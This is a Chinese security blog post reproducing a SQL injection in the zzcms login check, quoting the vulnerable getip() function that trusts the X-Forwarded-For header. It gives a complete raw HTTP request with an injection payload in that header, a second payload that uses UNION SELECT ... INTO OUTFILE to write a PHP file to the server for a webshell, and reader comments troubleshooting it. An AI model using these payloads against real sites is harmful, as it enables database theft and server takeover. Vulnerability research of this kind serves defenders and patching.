zzcms user/logincheck.php SQL注入
首页 > web安全 > 代码审计    作者:webbaozi   2017年2月9日 11:47 星期四   热度:1561°   百度已收录  
时间:2017-2-9 11:47   热度:1561° 

今天没事看了下

https://www.seebug.org/vuldb/ssvid-92628

https://www.seebug.org/vuldb/ssvid-92658

没有放出poc,自己动手。

第一个登录注入复现成功,但是第二个,始终绕不过。


登录地址:zzcms.com/user/login.php

登录成功会记录最后登录的ip地址

跟进获取ip函数

文件:inc/fuction.php


function getip(){
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}


 

可以伪造ip地址。

发包

POST /user/logincheck.php HTTP/1.1
Host: zzcms.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://zzcms.com/user/login.php
Cookie: bdshare_firstime=1486606533389; PHPSESSID=dpe74mriah3bq6aonec7tu3322
X-Forwarded-For:3',showloginip=(select user()),email='[email protected]
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

username=hello123&password=hello123&yzm=24&fromurl=&Submit=%E7%99%BB+%E5%BD%95





然后登录成功后在查看个人消息处查看

http://zzcms.com/user/index.php

图片1.png

如果权限为root权限可以构造如下包getshell:

X-Forwarded-For:3'and count>=5 and unix_timestamp()-unix_timestamp(sendtime)<600 and 1=2 union select 1,2,3,'<?php phpinfo();?>' into outfile 'c:/zzcms.php' #

二维码加载中...
本文作者:webbaozi      文章标题: zzcms user/logincheck.php SQL注入
本文地址:http://www.webbaozi.com/dmsj/47.html
版权声明:若无注明,本文皆为“baozi|学与用”原创,转载请保留文章出处。
xxoo2017-02-21 19:14
最后一个getshell语句,注入进去没生成文件。。。
webbaozi2017-02-21 21:43
@xxoo:说明mysql降权了,或者你路径填写错误了

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1